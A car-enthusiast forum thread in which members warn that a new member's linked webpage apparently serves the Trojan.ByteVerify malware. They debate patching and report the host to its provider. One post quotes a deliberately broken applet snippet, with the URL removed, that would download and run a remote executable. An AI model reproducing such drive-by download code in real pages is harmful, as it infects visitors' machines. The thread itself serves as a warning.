![]() |
|
|
|||||||
| Register | FAQ | Members List | Calendar | Search | Today's Posts | Mark Forums Read |
| Site Home | Forum Home | Photo Gallery | PT Events | PT Videos | Car Videos |
|
![]() |
|
|
LinkBack | Thread Tools | Display Modes |
|
|||
|
I believe new member 'funaudidrive' is knowingly attempting to spread a 'Trojan Horse' virus on this forum.I clicked on the link for his page, which is listed in his signature, and Norton caught it while the page was downloading.I just updated Norton this morning, so luckily it caught it.
Virus Name: Trojan.ByteVerify PS - Audis suck eggs |
|
|||
|
TripleJackInGA, I agree with you that Audi's suck eggs but I found no problem with his webpage. I am a Network administrator and this virus attacks vulnerabilities in Microsoft VM. It was not associated with his web site. Hackers use a lot of websites to exploit this vulnerability. (See link) http://www.microsoft.com/technet/sec.../MS03-011.mspx
What this is telling me is that you do not have the latest security updates on your computer. Do a windows update and get all the latest updates for your OS and you will be OK.
__________________
![]() http://www.cardomain.com/memberpage/504007 <b><i>Dream Bruizer DC1 #632</b></i> |
|
|||
|
Dream Bruizer, I'm not so sure about that. Looking at what Symantec's website says about this particular trojan plus that fact that I am fully current on Windows updates (XP Pro), plus the fact that the source code of his website has code that shows it pushing the .exe file, plus the fact he's coming to a non-Audi forum and all but taunting people, I think this little bugger is up to no good.
Here's the snippet from his source code: "applet code="BlackBox.class" archive="coderunZklsQ.jar" width=1 height=1 onerror="onError()"><param name="eurl" value="http://URL changed here by Mike-in-Orange for safety's sake!:80/hp.exe"></applet" NOTE: I removed certain brackets to ensure fully broken code.....I'm not taking ANY chances here! So....I did a quick Who Is lookup and traced him back to the hosting company he's using in Costa Mesa California. I contacted them and told them what he's doing. I figure his site will be down within 24 hours. |
|
|||
|
I'll never comprehend what would make people wanna be like that. Not enough love as a child? Pet spider died? Inflatable doll sprung a leak? [:I]
Get a life. ![]()
__________________
\'05 Limited Turbo Lite, (Silver, of course)4-wheel ABS, Sunroof, Spoiler, E&G Classic grill, K&N FIPK, BTG duals, rear lowered 1.5\", LED washer lights, $20 catch can, Aoogah horn, Weatherflectors, Sunroof Deflector, Fuzzy Dice, rear logo flames, rear pinstripe graphic, Gen3 Taillights, rear sway bar, hood struts, Strut bar. Traded in \'02 Silver Touring Edition w/87,000 miles |
|
|||
|
Quote:
BTW - Fix-A-Flat does *not* work well in these scenarios!
__________________
![]() ![]() \"They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety.\" Benjamin Franklin, Historical Review of Pennsylvania, 1759 www.cybermopar.com TripleJack |
![]() |
| Currently Active Users Viewing This Thread: 1 (0 members and 1 guests) | |
| Thread Tools | |
| Display Modes | |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Scam/Spam Alert | Stone-PT | Non-PT Discussions | 4 | 09 Sep 2006 03:33 am |
| Alert levels | quicksilverdon | Non-PT Discussions | 1 | 16 Aug 2005 10:52 pm |
| On Alert | Gary04GT | Non-PT Discussions | 1 | 08 Aug 2004 07:21 pm |
| Wild Thang III - Traffic Alert | tpscruiser | Northeast PT Forum | 4 | 30 Sep 2003 01:37 pm |